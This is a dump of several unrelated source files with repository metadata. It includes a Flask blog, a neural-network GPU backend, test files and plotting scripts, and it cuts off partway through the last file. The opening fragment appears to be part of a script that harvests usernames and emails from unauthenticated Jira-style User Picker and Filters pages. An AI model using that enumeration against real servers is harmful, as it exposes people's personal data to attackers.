filterResponse,filterAccessible = validateURL(filtersURL) print "" print "" print "[+] Checking the User Picker page..." if pickerAccessible == True: users = extractPicker(pickerResponse) print "" print "[+] Success..." 
print "[+] Users: "+str(len(users)) print "[+] Emails: " + str(len(users)) print "" if (args.emails and args.names) or args.all: print '{:<20}{:<20}'.format("---Username---", "---------Email---------") for username, email in sorted(users.iteritems()): print '{:<20}{:<20}'.format(username,email) elif args.emails: for username,email in sorted(users.iteritems()): print email elif args.names: for username,email in sorted(users.iteritems()): print username print "" elif pickerAccessible == False: print pickerResponse print "" print "" print "[+] Checking the Manage Filters page..." if filterAccessible == True: filterUsers = extractFilters(filterResponse) if args.names or args.all: if len(filterUsers) == 0: print "[-] We could not find any anonymously accessible filters" print "" else: print "[+] The Manage Filters page is accessible and contains data..." print "" for username in filterUsers: print username print "" elif filterAccessible == False: print filterResponse
3
3
run.py
SamChatfield/final-year-project
0
11847
import json import string from datetime import datetime import deap import numpy as np import hmm from discriminator import Discriminator from ea import EA import random_search DEFAULT_PARAMS = { # Discriminator CNN model "model": "CNNModel3", # Algorithm Parameters "states": 5, "symbols": 5, "epochs": 10, "epoch_size": 500, "batch_size": 200, "seq_len": 20, "pop_size": 25, "gens": 50, "offspring_prop": 1.0, "cx_prob": 0.0, "mut_fn": "uniform", "mut_prob": 1.0, "mut_rate": None, # None - default to 1/N where N is number of genes # Implementation Parameters "_pool_size": 4, "_random_search": True, # Also run an elitist random search over #gens to compare performance } def param_assert(params): assert params["states"] > 0 assert 0 < params["symbols"] <= 26 assert 0.0 <= params["offspring_prop"] <= 1.0 assert 0.0 <= params["cx_prob"] <= 1.0 assert 0.0 <= params["mut_prob"] <= 1.0 assert (params["mut_rate"] is None) or (0.0 <= params["mut_rate"] <= 1.0) def run(param_subset): # Overwrite the default values of the provided parameters params = {**DEFAULT_PARAMS, **param_subset} print(params) param_assert(params) x = params["states"] y = string.ascii_lowercase[: params["symbols"]] s = [1.0] + [0.0] * (x - 1) # Random HMM that will act as the 'true' underlying distribution real_hmm = hmm.random_hmm(x, y, s) # Different random HMM that will be used to benchmark the best solution we find rand_hmm = hmm.random_hmm(x, y, s) d = Discriminator( real_hmm, params["epoch_size"], params["batch_size"], params["seq_len"], model=params["model"], pool_size=params["_pool_size"], ) print("Pre-training discriminator...") accs, losses = d.initial_train(params["epochs"]) acc = accs[-1] loss = losses[-1] print(f"Pre-trained discriminiator accuracy: {acc}, loss: {loss}") g = EA( discriminator=d, pop_size=params["pop_size"], states=x, symbols=len(y), offpr=params["offspring_prop"], cxpb=params["cx_prob"], mut_fn=params["mut_fn"], mutpb=params["mut_prob"], mut_rate=params["mut_rate"], ) print("Running generator...") final_pop, _, logbook = g.run(params["gens"]) best_ind = deap.tools.selBest(final_pop, 1)[0] best_hmm = hmm.HMM(x, np.array(list(y)), best_ind[0], best_ind[1], np.array(s)) if params["_random_search"]: print("Running random search benchmark...") rs_best_hmm, rs_best_acc = random_search.run( d, params["states"], params["symbols"], params["gens"] ) else: rs_best_hmm, rs_best_acc = None, None return real_hmm, best_hmm, rand_hmm, rs_best_hmm, logbook def experiment(params, runs): all_params = {**DEFAULT_PARAMS, **params} do_rand_search = all_params["_random_search"] mean_fitnesses = [] best_l2s = [] rand_l2s = [] if do_rand_search: rs_l2s = [] for i in range(runs): print(f"Run {i+1}") real_hmm, best_hmm, rand_hmm, rs_best_hmm, logbook = run(params) best_l2 = hmm.total_l2_diff(real_hmm, best_hmm) rand_l2 = hmm.total_l2_diff(real_hmm, rand_hmm) if do_rand_search: rs_l2 = hmm.total_l2_diff(real_hmm, rs_best_hmm) mean_fitnesses.append(logbook.select("mean")) best_l2s.append(best_l2) rand_l2s.append(rand_l2) extra_msg = "" if do_rand_search: rs_l2s.append(rs_l2) extra_msg = f", RandSearch L2: {rs_l2}" print(f"Best L2: {best_l2}, Rand L2: {rand_l2}{extra_msg}") exp_data = { "params": all_params, "mean_fitnesses": mean_fitnesses, "best_l2s": best_l2s, "rand_l2s": rand_l2s, } if do_rand_search: exp_data["rs_l2s"] = rs_l2s exp_file = f'experiments/exp_{datetime.now().strftime("%y%m%d-%H%M%S%f")}.json' with open(exp_file, "w") as f: json.dump(exp_data, f, indent=4) return exp_data def main(): real_hmm, best_hmm, best_l2 = 
run(DEFAULT_PARAMS) print( f""" Real HMM: {real_hmm} Best HMM: {best_hmm} Best L2: {best_l2} """ ) if __name__ == "__main__": main()
2.53125
3
rrc_example_package/benchmark_rrc/tools/plot/exp_align_obj.py
wq13552463699/TriFinger_Research
12
11848
#!/usr/bin/env python3 ''' This code traverses a directories of evaluation log files and record evaluation scores as well as plotting the results. ''' import os import argparse import json import copy from shutil import copyfile import pandas as pd import seaborn as sns import matplotlib.pyplot as plt from utils import * MAX_ALIGN_STEPS = 75000 - 1 # This depends on the evaluation code used to generate the logs def generate_csv(log_dir, csv_file): ''' Traverse and read log files, and then output csv file from the eval data. - file to be generated: 'eval_scores.csv' - columns: state_machine_id, timesteps, rot_error ''' df = pd.DataFrame(columns=['state_machine_id', 'state_machine_name', 'timesteps', 'rot_error']) model_names = extract_model_names(log_dir) # Traverse all episodes and add each entry to data frame for state_machine_id, episode_idx, episode_dir in traverse_all_episodes(log_dir): json_util = JsonUtil(os.path.join(episode_dir, 'goal.json')) entry = { 'state_machine_id': state_machine_id, 'state_machine_name': model_names[state_machine_id], **json_util.load() } # Handling the timesteps==-1 case if entry['reachfinish'] == -1: entry['reachfinish'] = MAX_ALIGN_STEPS if entry['reachstart'] == -1: raise ValueError('\'reachstart\' in {episode_dir}/goal.json does not contain a valid value.') # Rename dict keys entry['timesteps'] = entry.pop('reachfinish') - entry.pop('reachstart') entry['rot_error'] = entry.pop('align_obj_error') entry['init_rot_error'] = entry.pop('init_align_obj_error', None) # Add a new entry entry['rot_error_diff'] = entry['init_rot_error'] - entry['rot_error'] df = df.append(entry, ignore_index=True) # df.append works differently from python since it is stupid df.to_csv(csv_file, index=False) def generate_plot(input_csv_file, plot_file): data = pd.read_csv(input_csv_file) sns.scatterplot(data=data, x="timesteps", y="rot_error", hue="state_machine_name", alpha=0.8) plt.savefig(plot_file)
2.640625
3
test cases/common/64 custom header generator/makeheader.py
objectx/meson
0
11849
#!/usr/bin/env python3

# NOTE: this file does not have the executable bit set. This tests that
# Meson can automatically parse shebang lines.

import sys

template = '#define RET_VAL %s\n'

output = template % (open(sys.argv[1]).readline().strip())

open(sys.argv[2], 'w').write(output)
2.0625
2
studio_ghibli/movies/test_data.py
hbansal0122/studio_ghibli_project
0
11850
<filename>studio_ghibli/movies/test_data.py
""" Test data"""

stub_films = [{
    "id": "12345",
    "title": "This is film one",
}, {
    "id": "23456",
    "title": "This is film two",
}]

stub_poeple = [{
    "name": "<NAME>",
    "films": ["url/12345", "url/23456"]
}, {
    "name": "<NAME>",
    "films": ["url/23456"]
}, {
    "name": "<NAME>",
    "films": ["url/12345"]
}, {
    "name": "person 4",
    "films": ["url/12345"]
}]
1.601563
2
data_converters/fsdbripper/create_new_db.py
osvaldolove/amiberry-api
0
11851
<reponame>osvaldolove/amiberry-api<gh_stars>0
import sqlite3

from constants import DESTINATION_DB

destination_connection = sqlite3.connect(DESTINATION_DB)
destination_cursor = destination_connection.cursor()

destination_cursor.execute('CREATE TABLE game(uuid, payload)')
1.75
2
upvote/gae/shared/common/json_utils_test.py
cclauss/upvote
0
11852
<reponame>cclauss/upvote<filename>upvote/gae/shared/common/json_utils_test.py # Copyright 2017 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for json_utils.""" import datetime import json from google.appengine.ext import ndb from common.testing import basetest from upvote.gae.datastore.models import santa from upvote.gae.shared.common import json_utils from upvote.shared import constants class TestModel(ndb.Model): datetime_prop = ndb.DateTimeProperty() int_prop = ndb.IntegerProperty() string_prop = ndb.StringProperty() class BaseEncoderTest(basetest.AppEngineTestCase): def setUp(self): super(BaseEncoderTest, self).setUp() self.test_model = TestModel( datetime_prop=datetime.datetime(2015, 6, 3, 12, 30, 0), int_prop=111, string_prop='STRING!') self.test_key = self.test_model.put() self.blockable_key = ndb.Key( santa.SantaBlockable, '<KEY>') self.santa_event = santa.SantaEvent( id='2324342', blockable_key=self.blockable_key, event_type=constants.EVENT_TYPE.ALLOW_UNKNOWN, executing_user='user1', file_name='Product.app', file_path='/Applications/Product.app/Contents/MacOs', host_id='AAAAAAAA-1111-BBBB-2222-CCCCCCCCCCCC', last_blocked_dt=datetime.datetime(2015, 4, 1, 17, 0, 0), first_blocked_dt=datetime.datetime(2015, 4, 1, 17, 0, 0)) def _PerformEncoding(self, to_encode): encoded = self.json_encoder.encode(to_encode) return json.loads(encoded) def _VerifyEncoding(self, expected, actual): if isinstance(expected, list): self.assertTrue(isinstance(actual, list)) self.assertEqual(len(expected), len(actual)) for i, j in zip(sorted(expected), sorted(actual)): self._VerifyEncoding(i, j) elif isinstance(expected, dict): self.assertTrue(isinstance(actual, dict)) # assertDictEqual would be more concise, but this keeps us from having to # update the expected dict every time there's a model change, e.g. # SantaEvent. 
for key, value in expected.iteritems(): self.assertIn(key, actual) self.assertEqual(value, actual[key]) else: self.assertEqual(expected, actual) class JSONEncoderTest(BaseEncoderTest): def setUp(self): super(JSONEncoderTest, self).setUp() self.json_encoder = json_utils.JSONEncoder() def testEncode_Set(self): actual = self._PerformEncoding(set(['aaa', 'bbb', 'ccc'])) self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual) def testEncode_Frozenset(self): actual = self._PerformEncoding(frozenset(['aaa', 'bbb', 'ccc'])) self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual) def testEncode_Datetime(self): actual = self._PerformEncoding(datetime.datetime(2015, 4, 1, 17, 0, 0)) self._VerifyEncoding('2015-04-01T17:00Z', actual) def testEncode_Date(self): actual = self._PerformEncoding(datetime.date(2014, 2, 3)) self._VerifyEncoding('2014-02-03', actual) def testEncode_Time(self): actual = self._PerformEncoding(datetime.time(10, 20, 30)) self._VerifyEncoding('10:20:30', actual) def testEncode_Key(self): expected = self.test_key.urlsafe() actual = self._PerformEncoding(self.test_key) self._VerifyEncoding(expected, actual) def testEncode_Model(self): expected = { 'datetime_prop': '2015-06-03T12:30Z', 'int_prop': 111, 'string_prop': 'STRING!'} actual = self._PerformEncoding(self.test_model) self._VerifyEncoding(expected, actual) def testEncode_SantaEvent(self): # Test the encoding of a single SantaEvent. expected = { 'blockable_key': self.blockable_key.urlsafe(), 'class_': ['Event', 'SantaEvent'], 'event_type': constants.EVENT_TYPE.ALLOW_UNKNOWN, 'executing_user': 'user1', 'file_name': 'Product.app', 'file_path': '/Applications/Product.app/Contents/MacOs', 'host_id': 'AAAAAAAA-1111-BBBB-2222-CCCCCCCCCCCC', 'id': '2324342', 'last_blocked_dt': '2015-04-01T17:00Z', 'first_blocked_dt': '2015-04-01T17:00Z', } actual = self._PerformEncoding(self.santa_event) self._VerifyEncoding(expected, actual) # Test the encoding of a SantaEvent list. actual = self._PerformEncoding([self.santa_event]) self._VerifyEncoding([expected], actual) def testEncodeBoolean(self): """Test encoding a single Boolean value.""" actual = self._PerformEncoding(True) self._VerifyEncoding(True, actual) class JSONEncoderJavascriptTest(BaseEncoderTest): def setUp(self): super(JSONEncoderJavascriptTest, self).setUp() self.json_encoder = json_utils.JSONEncoderJavaScript() def testEncode_Set(self): actual = self._PerformEncoding(set(['aaa', 'bbb', 'ccc'])) self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual) def testEncode_Frozenset(self): actual = self._PerformEncoding(frozenset(['aaa', 'bbb', 'ccc'])) self._VerifyEncoding(['aaa', 'bbb', 'ccc'], actual) def testEncode_Datetime(self): actual = self._PerformEncoding(datetime.datetime(2015, 4, 1, 17, 0, 0)) self._VerifyEncoding('2015-04-01T17:00Z', actual) def testEncode_Date(self): actual = self._PerformEncoding(datetime.date(2014, 2, 3)) self._VerifyEncoding('2014-02-03', actual) def testEncode_Time(self): actual = self._PerformEncoding(datetime.time(10, 20, 30)) self._VerifyEncoding('10:20:30', actual) def testEncode_Key(self): expected = self.test_key.urlsafe() actual = self._PerformEncoding(self.test_key) self._VerifyEncoding(expected, actual) def testEncode_Model(self): expected = { 'datetimeProp': '2015-06-03T12:30Z', 'intProp': 111, 'stringProp': 'STRING!'} actual = self._PerformEncoding(self.test_model) self._VerifyEncoding(expected, actual) def testEncode_SantaEvent(self): # Test the encoding of a single SantaEvent. 
expected = { 'blockableKey': self.blockable_key.urlsafe(), 'class_': ['Event', 'SantaEvent'], 'eventType': constants.EVENT_TYPE.ALLOW_UNKNOWN, 'executingUser': 'user1', 'fileName': 'Product.app', 'filePath': '/Applications/Product.app/Contents/MacOs', 'hostId': 'AAAAAAAA-1111-BBBB-2222-CCCCCCCCCCCC', 'id': '2324342', 'lastBlockedDt': '2015-04-01T17:00Z', 'firstBlockedDt': '2015-04-01T17:00Z', } actual = self._PerformEncoding(self.santa_event) self._VerifyEncoding(expected, actual) # Test the encoding of a SantaEvent list. actual = self._PerformEncoding([self.santa_event]) self._VerifyEncoding([expected], actual) def testEncodeBoolean(self): """Test encoding a single Boolean value.""" actual = self._PerformEncoding(True) self._VerifyEncoding(True, actual) if __name__ == '__main__': basetest.main()
2.015625
2
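The tests in the json_utils_test.py record above pin down the encoder behaviour; a hedged sketch of the plain JSONEncoder on ordinary values (dates become ISO strings, sets become lists), assuming the upvote/App Engine dependencies it imports are available.

import datetime
from upvote.gae.shared.common import json_utils

encoder = json_utils.JSONEncoder()
print(encoder.encode({"when": datetime.date(2014, 2, 3), "who": {"aaa", "bbb"}}))
# e.g. {"when": "2014-02-03", "who": ["aaa", "bbb"]}  (set ordering not guaranteed)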
app.py
YukiNagat0/Blog
1
11853
from os import path from typing import Union from datetime import datetime from flask import Flask, request, redirect, render_template from flask_wtf import CSRFProtect from werkzeug.utils import secure_filename from data import db_session from data.posts import Posts from forms.edit_post_form import EditPostForm app = Flask(__name__) app.config['SECRET_KEY'] = 'SECRET_KEY' csrf_protect = CSRFProtect(app) UPLOAD_FOLDER = 'static/posts_img/' app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER DATA_BASE = 'db/blog.sqlite' app.config['DATA_BASE'] = DATA_BASE def edit_post_in_data_base(form: EditPostForm, post: Union[Posts, None]): db_sess = db_session.create_session() post_title = form.title.data post_text = form.text.data post_author = form.author.data post_image = form.image.data # --- Фотография --- if not post_image: post_image_name = '' # Картинки нет else: current_id = db_sess.query(Posts).order_by(Posts.id.desc()).first() current_id = current_id.id + 1 if current_id else 1 real_image_name = secure_filename(post_image.filename) post_image_name = f'{current_id}{real_image_name[real_image_name.rfind("."):]}' post_image.save(path.join(app.config['UPLOAD_FOLDER'], post_image_name)) # --- Фотография --- if not post: # Добавление поста post = Posts() post.title = post_title post.image_name = post_image_name post.text = post_text post.author = post_author post.date = datetime.now() db_sess.add(post) else: # редактирование post.title = post_title post.image_name = post_image_name post.text = post_text post.author = post_author post.date = datetime.now() db_sess.merge(post) db_sess.commit() db_sess.close() return redirect('/') @app.route('/') def index(): params = {'title': 'Blog', 'UPLOAD_FOLDER': app.config['UPLOAD_FOLDER']} db_sess = db_session.create_session() posts = db_sess.query(Posts).order_by(Posts.id.desc()).all() view = render_template('blog.html', **params, posts=posts) db_sess.close() return view @app.route('/add_post', methods=['GET', 'POST']) def add_post(): params = {'title': 'Добавление поста', 'action_type': 'Добавление поста', 'submit_text': 'Добавить'} form = EditPostForm() params['form'] = form if form.validate_on_submit(): return edit_post_in_data_base(form, None) return render_template('edit_post.html', **params) @app.route('/edit_post/<int:post_id>', methods=['GET', 'POST']) def edit_post(post_id: int): params = {'title': 'Редактирование поста', 'action_type': 'Редактирование поста', 'submit_text': 'Редактировать'} form = EditPostForm() params['form'] = form db_sess = db_session.create_session() post: Posts = db_sess.query(Posts).filter(Posts.id == post_id).first() db_sess.close() if not post: return redirect('/') if request.method == 'GET': form.title.data = post.title form.text.data = post.text form.author.data = post.author elif form.validate_on_submit(): return edit_post_in_data_base(form, post) return render_template('edit_post.html', **params) @app.route('/delete_post/<int:post_id>') def delete_post(post_id: int): db_sess = db_session.create_session() post = db_sess.query(Posts).filter(Posts.id == post_id).first() if post: db_sess.delete(post) db_sess.commit() db_sess.close() return redirect('/') def main(): db_session.global_init(app.config['DATA_BASE']) app.run('127.0.0.1', 8080) if __name__ == '__main__': main()
2.25
2
neon/backends/gpu.py
kashif/neon
1
11854
# ---------------------------------------------------------------------------- # Copyright 2014 Nervana Systems Inc. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ---------------------------------------------------------------------------- """ Neon backend wrapper for the NervanaGPU library. Most functions are thin wrappers around functions from the NervanaGPU class, the GPUTensor is taken directly from NervanaGPU as well. NervanaGPU is available at `<https://github.com/NervanaSystems/nervanagpu>` """ import logging from neon.backends.backend import Backend from nervanagpu import NervanaGPU from neon.diagnostics.timing_decorators import FlopsDecorator import pycuda.driver as drv import numpy as np logger = logging.getLogger(__name__) class GPU(Backend): """ Sets up a NervanaGPU based backend for matrix operations. Note that some functions defined in the generic Backend class such as cross-map pooling and normalization and are not implemented for this backend. """ default_dtype = np.float32 def __init__(self, rng_seed, stochastic_round=False, device_id=0): import pycuda.driver as drv drv.init() global ctx ctx = drv.Device(device_id).make_context() import atexit atexit.register(ctx.pop) self.ng = NervanaGPU(stochastic_round=stochastic_round) logger.info("Initialized NervanaGPU with stochastic_round=%s", stochastic_round) self.rng_seed = rng_seed self.rng_init() self.device_id = device_id if device_id is not None else 0 def __getstate__(self): """ Defines what and how we go about serializing an instance of this class. Returns: self.__dict__: The full contents of the backend class instance, except for the mem_pool which is on device and cannot be serialized. """ if hasattr(self, 'mem_pool') and self.mem_pool is not None: self.mem_pool_pickle = {'shape': self.mem_pool.shape, 'dtype': np.float32} self.mem_pool = None return self.__dict__ def __setstate__(self, state): """ Defines how we go about deserializing into an instance of this class. Arguments: self.__dict__: The full contents of the backend class instance, except for the mem_pool which is on device and cannot be serialized. """ self.__dict__.update(state) self.mem_pool = self.ng.empty(self.mem_pool_pickle['shape'], dtype=self.mem_pool_pickle['dtype']) def init_mempool(self, shape, dtype=default_dtype): """ Allocates a memory pool for temporary storage """ self.mem_pool = self.ng.empty(shape, dtype=dtype) def alloc_host_mem(self, shape, dtype=default_dtype): return drv.pagelocked_empty(shape, dtype, order="C", mem_flags=0) def create_stream(self): return drv.Stream() def synchronize(self): pass def async_copy(self, dest, src, stream=None): drv.memcpy_htod_async(dest.gpudata, src, stream) def rng_init(self): """ Initialize and seed the pseudo random number genrator. Random numbers are generated on the host using numpy, then transfered to device. 
""" seed = None if 'rng_seed' in self.__dict__: seed = self.rng_seed logger.info("Seeding random number generator with: %s", str(seed)) np.random.seed(seed) def flop_timing_init(self, decorate_fc, decorate_conv, decorate_ew): """ Initialize FLOP timing. Wraps the specified MOP calls via a decorator to record elapsed time and number of operations. Arguments: decorate_fc (list): string giving the function names of fully connected layer forward/backward/update calls to time. decorate_conv (list): string giving the function names of convolutional layer forward/backward/update calls to time. decorate_ew (list): string giving the function names of element-wise calls to time. Notes: Must be called prior to first flop_timing_start call """ self.start = drv.Event() self.end = drv.Event() self.flop_timer = FlopsDecorator(self) self.flop_timer.decorate(decorate_fc=decorate_fc, decorate_conv=decorate_conv, decorate_ew=decorate_ew) def flop_timinig_start(self): """ Start a new FLOP timer. Returns: None: dummy value (not used) """ return self.start.record() def flop_timing_finish(self, start_time): """ Complete current FLOP timing. Arguments: start_time (unused): ignored. Returns: float: elapsed time in seconds since prior flop_timing_start call. """ self.end.record() self.end.synchronize() return self.end.time_since(self.start) def uniform(self, low=0.0, high=1.0, size=1, dtype=default_dtype, persist_values=True, name=None): """ generate numpy random number and convert to a GPUTensor. If called with dype=None it will probably explode """ ary = np.random.uniform(low, high, size) return self.ng.array(ary, dtype=dtype, name=name) def normal(self, loc=0.0, scale=1.0, size=1, dtype=default_dtype, persist_values=True, name=None): """ Gaussian/Normal random number sample generation """ ary = np.random.normal(loc, scale, size) return self.ng.array(ary, dtype=dtype, name=name) def fprop_fc(self, out, inputs, weights, layer=None): """ Forward propagate the inputs of a fully connected network layer to produce output pre-activations (ready for transformation by an activation function). Arguments: out (GPUTensor): Where to store the forward propagated results. inputs (GPUTensor): Will be either the dataset input values (first layer), or the outputs from the previous layer. weights (GPUTensor): The weight coefficient values for this layer. layer (Layer): The layer object. """ self.ng.dot(weights, inputs, out) def bprop_fc(self, out, weights, deltas, layer=None): """ Backward propagate the error through a fully connected network layer. Arguments: out (GPUTensor): Where to store the backward propagated errors. weights (GPUTensor): The weight coefficient values for this layer. deltas (GPUTensor): The error values for this layer layer (Layer): The layer object. """ self.ng.dot(weights.T, deltas, out) def update_fc(self, out, inputs, deltas, layer=None): """ Compute the updated gradient for a fully connected network layer. Arguments: out (GPUTensor): Where to store the updated gradient value. inputs (GPUTensor): Will be either the dataset input values (first layer), or the outputs from the previous layer. deltas (GPUTensor): The error values for this layer layer (Layer): The layer object. """ self.ng.dot(deltas, inputs.T, out) def update_fc_bias(self, err, out): """ Compute the updated bias gradient for a fully connected network layer. Arguments: out (GPUTensor): Where to store the updated gradient value. 
err (GPUTensor): backpropagated error """ self.ng.sum(err, axis=1, out=out) def add_fc_bias(self, inputs, bias): """ Add the bias for a fully connected network layer. Arguments: inputs (GPUTensor): the input to update. bias (GPUTensor): the amount to increment """ self.ng.add(inputs, bias, out=inputs) def fprop_conv(self, out, inputs, weights, ofmshape, ofmsize, ofmlocs, ifmshape, links, nifm, padding, stride, ngroups, fpropbuf, local=False): """ Forward propagate the inputs of a convolutional network layer to produce output pre-activations (ready for transformation by an activation function). Arguments: out (GPUTensor): Where to store the forward propagated results. inputs (GPUTensor): Will be either the dataset input values (first layer), or the outputs from the previous layer. weights (GPUTensor): The weight coefficient values for this layer. ofmshape (tuple): Dimensions of each output feature map (typically number of height and width neurons). ofmsize (int): Total size of each output feature map. ofmlocs (GPUTensor): Indices giving the location of each element in each output feature map stored in out. ifmshape (tuple): Dimensions of each input feature map (typically number of height and width neurons). For this backend we expect these values to be square. links (GPUTensor): Input receptive field indices. nifm (int): Total number of input feature maps. padding (int): Number of additional elements to include along each dimension of each local receptive field during the convolution operation. stride (int): Number of neurons to shift the filter at each step. ngroups (int): Number of groups. fpropbuf (GPUTensor): Temporary storage buffer used to hold the convolved outputs for a single receptive field. Not used for this backend. local (bool, optional): Whether to do local filtering (True) or convolution (False, the default) """ ''' N: Number of images in mini-batch C: Number of input feature maps K: Number of output feature maps D: Depth of input image H: Height of input image W: Width of input image T: Depth of filter kernel R: Height of filter kernel S: Width of filter kernel ''' self.ng.fprop_conv(layer=fpropbuf, I=inputs, F=weights, O=out, alpha=1.0, repeat=1) def bprop_conv(self, out, weights, deltas, ofmshape, ofmsize, ofmlocs, ifmshape, links, padding, stride, nifm, ngroups, bpropbuf, local=False): """ Backward propagate the error through a convolutional network layer. Arguments: out (GPUTensor): Where to store the backward propagated errors. weights (GPUTensor): The weight coefficient values for this layer. deltas (GPUTensor): The error values for this layer ofmshape (tuple): Dimensions of each output feature map (typically height and width). ofmsize (int): Total size of each output feature map. ofmlocs (GPUTensor): Indices giving the location of each element in each output feature map stored in out. ifmshape (tuple): Dimensions of each input feature map (typically height and width). links (GPUTensor): Input receptive field indices. nifm (int): Total number of input feature maps. padding (int): Number of additional elements to include along each dimension of each local receptive field during the convolution operation. stride (int): Number of neurons to shift the filter at each step. ngroups (int): Number of groups. 
bpropbuf (GPUTensor): Temporary storage buffer used to hold the backpropagated error for a single receptive field local (bool, optional): Whether to do local filtering (True) or convolution (False, the default) """ self.ng.bprop_conv(layer=bpropbuf, F=weights, E=deltas, grad_I=out, alpha=1.0, repeat=1) def update_conv(self, out, inputs, weights, deltas, ofmshape, ofmsize, ofmlocs, ifmshape, links, nifm, padding, stride, ngroups, fwidth, updatebuf, local=False, layer=None): """ Compute the updated gradient for a convolutional network layer. Arguments: out (GPUTensor): Where to store the updated gradient value. inputs (GPUTensor): Will be either the dataset input values (first layer), or the outputs from the previous layer. weights (GPUTensor): The weight coefficient values for this layer. deltas (GPUTensor): The error values for this layer ofmshape (tuple): Dimensions of each output feature map (typically height and width). ofmsize (int): Total size of each output feature map. ofmlocs (GPUTensor): Indices giving the location of each element in each output feature map stored in out. ifmshape (tuple): Dimensions of each input feature map (typically height and width). links (GPUTensor): Input receptive field indices. nifm (int): Total number of input feature maps. padding (int): Number of additional elements to include along each dimension of each local receptive field during the convolution operation. stride (int): Number of neurons to shift the filter at each step. ngroups (int): Number of groups. fwidth (int): Filter width. updatebuf (GPUTensor): Temporary storage buffer used to hold the updated gradient for a single receptive field local (bool, optional): Whether to do local filtering (True) or convolution (False, the default) layer (Layer): The layer object. """ self.ng.update_conv(layer=updatebuf, I=inputs, E=deltas, grad_F=out, alpha=1.0, repeat=1) def fprop_pool(self, out, inputs, op, ofmshape, ofmsize, ofmlocs, fshape, ifmshape, links, nifm, padding, stride, fpropbuf): """ Forward propagate the inputs of a Pooling network layer to produce output pre-activations (ready for transformation by an activation function). Arguments: out (GPUTensor): Where to store the forward propagated results. inputs (GPUTensor): Will be either the dataset input values (first layer), or the outputs from the previous layer. op (string): The type of pooling operation to apply. We support "max", "avg", "l2" currently. ofmshape (tuple): Dimensions of each output feature map (typically number of height and width neurons). ofmsize (int): Total size of each output feature map. ofmlocs (GPUTensor): Indices giving the location of each element in each output feature map stored in out. fshape (tuple): Dimensions of each filter (typically height and width). ifmshape (tuple): Dimensions of each input feature map (typically number of height and width neurons). links (GPUTensor): Input receptive field indices. nifm (int): Total number of input feature maps. padding (int): Number of additional elements to include along each dimension of each local receptive field during the pooling operation. stride (int): Number of neurons to shift the filter at each step. fpropbuf (GPUTensor): Temporary storage buffer used to hold the pooled outputs for a single receptive field. 
""" op = op.lower() if op == "max": self.ng.fprop_pool(layer=fpropbuf, I=inputs, O=out, repeat=1) else: raise AttributeError("unexpected pooling op type: %s", op) def bprop_pool(self, out, fouts, inputs, deltas, op, ofmshape, ofmsize, ofmlocs, fshape, fpsize, ifmshape, links, nifm, padding, stride, bpropbuf): """ Backward propagate the error through a pooling network layer. Arguments: out (GPUTensor): Where to store the backward propagated errors. fouts (GPUTensor): Forward propagated outputs from the previous layer. inputs (GPUTensor): Will be either the dataset input values (first layer), or the outputs from the previous layer. deltas (GPUTensor): The error values for this layer op (string): The type of pooling operation to apply. We support "max", "avg", "l2" currently. ofmshape (tuple): Dimensions of each output feature map (typically height and width). ofmsize (int): Total size of each output feature map. ofmlocs (GPUTensor): Indices giving the location of each element in each output feature map stored in out. fshape (tuple): Dimensions of each filter (typically height and width). fpsize (int): The size of each filter. ifmshape (tuple): Dimensions of each input feature map (typically height and width). links (GPUTensor): Input receptive field indices. nifm (int): Total number of input feature maps. padding (int): Number of additional elements to include along each dimension of each local receptive field during the pooling operation. stride (int): Number of neurons to shift the filter at each step. bpropbuf (GPUTensor): Temporary storage buffer used to hold the backpropagated error for a single receptive field """ op = op.lower() if op == "max": self.ng.bprop_pool(layer=bpropbuf, I=inputs, E=deltas, grad_I=out, repeat=1) else: raise AttributeError("unexpected pooling op type: %s", op) def logistic(self, x, out): """ Logistic sigmoid nonlinearity, 1/(1+exp(-x)) Arguments: x (GPUTensor): Input tensor out (GPUTensor): Output tensor """ self.ng.sig(x, out=out) return out def transpose(self, untransposed, transposed): transposed[:] = untransposed.T def crossent(self, y, t, partial, out, epsilon, doscale, ismulti=False): """ Computes cross entropy cost. Arguments: y (GPUTensor): Model outputs t (GPUTensor): Targets partial (GPUTensor): temporary buffer used for 2D reduction out (GPUTensor): Storage for the cross entropy output epsilon (float): constant for numerical stability doscale (boolean): If True, cross_entropy is scaled by batch size ismulti (boolean): If True, compute multi class cross_entropy """ sumbuf = partial.reshape((partial.size, 1))[:partial.shape[0]] if ismulti: self.ng.sum(-t * self.ng.log(y + epsilon), axis=None, partial=sumbuf, out=out) else: self.ng.sum((t - 1) * self.ng.log(1 - y + epsilon) - t * self.ng.log(y + epsilon), axis=None, partial=sumbuf, out=out) if doscale: out[:] = out / y.shape[1] return out def logistic_compound(self, inputs, outputs): """ Applies logistic function and its derivative to the dataset passed. Arguments: inputs (GPUTensor): Input data to be transformed. This also acts as storage for the output of the derivative function. outputs (GPUTensor): Storage for the transformed output. """ # Apply the logistic function. 
